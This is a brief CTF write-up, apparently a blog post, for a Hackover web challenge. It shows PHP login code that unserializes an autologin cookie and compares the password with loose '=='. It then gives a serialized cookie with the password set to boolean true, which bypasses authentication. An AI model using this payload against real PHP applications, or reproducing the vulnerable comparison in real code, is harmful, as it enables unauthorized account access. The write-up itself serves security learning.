A long time since last writeup so i have decided comment a simple web level solved on «Hackover CTF». It’s very old vulnerability related with type safe comparation on PHP and serialize function. We have a web login with normal test users (demo, demo2) and a ‘remember login’ function that help us to keep login ‘passing data’ to autologin cookie, which have the vulnerability. This cookie has the original format:
a:2:{s:8:"username";s:4:"demo";s:8:"password";s:32:"6388af9e3c3b76e5f053c0ff204f9228";}
As wen can see the source code of the application we start analyzing vulnerable points on do_login method, seeing what’s really compared with this piece of serialized cookie string.
function do_login($username, $pw_hash, $autologin)
{
global $db;
if (isset($_SESSION['user_id'])) {
return true;
}
$sth = $db->prepare('SELECT id, password FROM account WHERE username = ?');
$sth->bindValue(1, $username);
$result = $sth->execute()->fetchArray();
if ($result && $result['password'] == $pw_hash) { //<-- See how is compared, == instead === !!!
$_SESSION['user_id'] = $result['id'];
if ($autologin) {
setcookie('autologin', serialize(array(
'username' => $username,
'password' => $pw_hash
)), time() + 60*60*24*14);
}
header('Location: /');
die();
}
return false;
}
if (isset($_COOKIE['autologin'])) {
$data = @unserialize($_COOKIE['autologin']);
do_login($data['username'], $data['password'], true); // and here data unserialized.
}
So the problem is we can set a boolean true value in serialized password data and this will produce ‘true’ comparation. Here it’s:
a:2:{s:8:"username";s:5:"Alice";s:8:"password";b:1;}
Ok. It’s all to get the flag.
If you are interested on this PHP serialize vulnerability and others like that, see this pdf:
http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20POC2009%20Shocking%20News%20In%20PHP%20Exploitation.pdf
